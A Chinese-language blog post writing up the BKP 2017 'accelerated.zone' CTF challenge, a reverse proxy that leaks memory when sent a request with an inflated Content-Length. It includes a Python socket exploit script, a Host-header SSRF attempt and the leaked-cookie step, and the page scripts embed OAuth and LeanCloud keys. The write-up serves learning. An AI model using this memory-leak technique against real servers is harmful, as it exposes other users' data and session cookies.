<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="google-site-verification" content="uA2LBPduURBuZGtOxH8gqs2DqL7Nw4ApMxyaAyc0lRo" />
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf," />










<meta name="description" content="这两天做bkp ctf，算是我第一次认真参加的国际级比赛了。总的感受就是，相比国内的比赛，综合度要高得多，不容易看出题目的考察点。现在web手不会点binary都不好意思出来打比赛了，然而web都还没学好orz。总之，两天比下来还是感觉非常充实，学到了不少。对体力的消耗也很大，比完赛两天一直昏昏沉沉，直到现在才打起精神来总结一下。 首先说accelerated zone这道题。这题挂着web的名号">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="BKP2017-Writeup-Accelerated.zone">
<meta property="og:url" content="https://eviloh.github.io/2017/03/02/BKP2017-Writeup-Accelerated-zone/index.html">
<meta property="og:site_name" content="eviloH&#39;s space">
<meta property="og:description" content="这两天做bkp ctf，算是我第一次认真参加的国际级比赛了。总的感受就是，相比国内的比赛，综合度要高得多，不容易看出题目的考察点。现在web手不会点binary都不好意思出来打比赛了，然而web都还没学好orz。总之，两天比下来还是感觉非常充实，学到了不少。对体力的消耗也很大，比完赛两天一直昏昏沉沉，直到现在才打起精神来总结一下。 首先说accelerated zone这道题。这题挂着web的名号">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://eviloh.github.io/images/BKP2017/nccontent.png">
<meta property="og:image" content="https://eviloh.github.io/images/BKP2017/payload.png">
<meta property="og:updated_time" content="2018-07-29T13:18:20.176Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BKP2017-Writeup-Accelerated.zone">
<meta name="twitter:description" content="这两天做bkp ctf，算是我第一次认真参加的国际级比赛了。总的感受就是，相比国内的比赛，综合度要高得多，不容易看出题目的考察点。现在web手不会点binary都不好意思出来打比赛了，然而web都还没学好orz。总之，两天比下来还是感觉非常充实，学到了不少。对体力的消耗也很大，比完赛两天一直昏昏沉沉，直到现在才打起精神来总结一下。 首先说accelerated zone这道题。这题挂着web的名号">
<meta name="twitter:image" content="https://eviloh.github.io/images/BKP2017/nccontent.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://eviloh.github.io/2017/03/02/BKP2017-Writeup-Accelerated-zone/"/>





  <title>BKP2017-Writeup-Accelerated.zone | eviloH's space</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">eviloH's space</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">想写就写</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://eviloh.github.io/2017/03/02/BKP2017-Writeup-Accelerated-zone/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="eviloH">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/zy.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="eviloH's space">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">BKP2017-Writeup-Accelerated.zone</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-03-02T20:41:42+08:00">
                2017-03-02
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/03/02/BKP2017-Writeup-Accelerated-zone/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2017/03/02/BKP2017-Writeup-Accelerated-zone/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2017/03/02/BKP2017-Writeup-Accelerated-zone/" class="leancloud_visitors" data-flag-title="BKP2017-Writeup-Accelerated.zone">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这两天做bkp ctf，算是我第一次认真参加的国际级比赛了。总的感受就是，相比国内的比赛，综合度要高得多，不容易看出题目的考察点。现在web手不会点binary都不好意思出来打比赛了，然而web都还没学好orz。总之，两天比下来还是感觉非常充实，学到了不少。对体力的消耗也很大，比完赛两天一直昏昏沉沉，直到现在才打起精神来总结一下。</p>
<p>首先说accelerated zone这道题。这题挂着web的名号，实际上是一道逆向题。但当时也不懂就傻傻的测试，几乎花了第一天大半的时间，最后还是靠队伍里的大腿指点才get flag。在此记录一下思路。</p>
<p>题目给了一个网址：<a href="http://accelerated.zone:8000" target="_blank" rel="noopener">http://accelerated.zone:8000</a> 和一个二进制文件。题目描述为reverse proxy。关于反代这篇文章讲得很清楚：<a href="https://foofish.net/proxy-and-reverse-proxy.html" target="_blank" rel="noopener">https://foofish.net/proxy-and-reverse-proxy.html</a> 。</p>
<p>站点分析：</p>
<ol>
<li>如果以GET方式请求该网站，返回500响应头以及一句话：Get better cookies bro。推测本题最终是找到一个cookie并且上传到此站点以获得flag。</li>
<li>对web目录进行扫描，除了index.php没有找到其它文件，猜测后台是php环境。</li>
<li>对网站端口进行扫描，发现7733端口也开着web服务，行为与8000端口一致，结合题目信息，猜测8000为7733端口的反代服务器。</li>
</ol>
<p>二进制文件的分析就不是我擅长的了，经过队伍里二进制大佬的帮助，基本分析清楚。这就是该站点上挂的web反代服务器。它使用了libmicrohttpd这个库来处理收到的请求，函数名称为handle_request，用libcurl库来处理转发的请求，函数名称为make_request。经过wireshark抓包分析可知，代理服务器会将收到的http请求进行转发，转发到ip为收到的请求中host头所写的ip，port为7733端口的地址，再将收到的回复转发回来。</p>
<p>那么作为一个web狗，最先想到的是利用ssrf的思路越权访问本地的一些文件。我尝试将host改成127.0.0.1，这样反代服务器会尝试访问127.0.0.1:7733，但是一直访问失败。将host改成localhost以及一些解析为127.0.0.1的域名后也同样不能访问，那么应该是代理服务器做了某些过滤，ssrf的思路行不通。</p>
<p>我又想着能否在自己的vps上开一个7733端口并且放一个一句话看反代服务器是否会下载到本地执行。结果虽然执行成功，但是却是在我自己的vps的执行结果，反代服务器只会返回解析后的结果。</p>
<p>其实这里本来不用走这么多弯路，分析二进制文件的逆向代码就能搞清楚，无奈没有这个技能点。后来经过大佬提示，说这题的原型是cloudbleed .我赶紧现学现用了一下。既然这个漏洞的描述是长度不匹配，那么肯定是http头里面的Content-Length了。</p>
<p>payload 如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"></span><br><span class="line">request = ”’POST / HTTP/<span class="number">1.1</span>\r\nHost: Your vps:<span class="number">8000</span>\r\nUser-Agent: Mozilla/<span class="number">5.0</span> (Windows NT <span class="number">10.0</span>; WOW64; rv:<span class="number">50.0</span>) Gecko/<span class="number">20100101</span> Firefox/<span class="number">50.0</span>\r\nAccept: text/html,application/xhtml+xml,application/xml;q=<span class="number">0.9</span>,/;q=<span class="number">0.8</span>\r\nAccept-Language: zh-CN,zh;q=<span class="number">0.8</span>,en-US;q=<span class="number">0.5</span>,en;q=<span class="number">0.3</span>\r\nAccept-Encoding: gzip, deflate\r\nConnection: close Upgrade-Insecure-Requests: <span class="number">1</span>\r\nContent-Length: <span class="number">50000</span>\r\n\r\n123”’</span><br><span class="line">HOST = ‘<span class="number">54.218</span><span class="number">.82</span><span class="number">.219</span>’</span><br><span class="line">PORT = <span class="number">8000</span></span><br><span class="line">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">s.connect((HOST, PORT))</span><br><span class="line">request = bytes(request, encoding = “utf8”)</span><br><span class="line">s.send(request)</span><br></pre></td></tr></table></figure></p>
<p>在自己的vps上打开7733端口，便可以收到代理服务器转发的请求。由于代理服务器没有验证Content-Length的长度和post提交的长度是否相等。如果Content-Length提交的长度大于post的实际长度，代理服务器就会将内存中这个报文之后的内容一起发过来，直到达到Content-Length的长度。由此造成了内存泄露。<br><img src="/images/BKP2017/nccontent.png" alt="nc"></p>
<p>从泄露的内存中我们获得了一个cookie，将这个cookie带上发给accelerated.zone:8000，即Get flag：<br><img src="/images/BKP2017/payload.png" alt="nc"></p>
<p>回顾这道题整个过程，实际上逆向的部分要远远大于web的部分，可见国际比赛考验的是选手的综合安全素养，这方面自己还要提高才行，多多向队伍里的大佬学习。同时，web思维走不通的地方，也应该多考虑下其他的方向。</p>

      
    </div>
    <div>    
 
 
    <ul class="post-copyright">
      <li class="post-copyright-author">
          <strong>本文作者：</strong>eviloH
      </li>
      <li class="post-copyright-link">
        <strong>本文链接：</strong>
        <a href="/2017/03/02/BKP2017-Writeup-Accelerated-zone/" title="BKP2017-Writeup-Accelerated.zone">2017/03/02/BKP2017-Writeup-Accelerated-zone/</a>
      </li>
      <li class="post-copyright-license">
        <strong>版权声明： </strong>
        本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0 CN</a> 许可协议。转载请注明出处！
      </li>
    </ul>
  
</div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/07/30/XSS-Filter-Evasion-Cheat-Sheet研究/" rel="prev" title="XSS Filter Evasion Cheat Sheet研究">
                XSS Filter Evasion Cheat Sheet研究 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/zy.jpg"
                alt="eviloH" />
            
              <p class="site-author-name" itemprop="name">eviloH</p>
              <p class="site-description motion-element" itemprop="description">记录平淡的生活</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">eviloH</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
    
<!-- END LOCAL -->

    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitmint({
            id: '1488458502000', 
            owner: 'eviloH',
            repo: 'eviloH.github.io',
            
            lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
            
            oauth: {
            
            
                client_secret: '534cb13bbf0ae4c3f2e7426b2988fddb17d0936a',
            
                client_id: 'e8e81f52a3b78b4ff0e4'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("ygFLJkCejHN4FBRm1MNotECL-gzGzoHsz", "D41dFC6ScJB4YxsA8qiAESs1");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
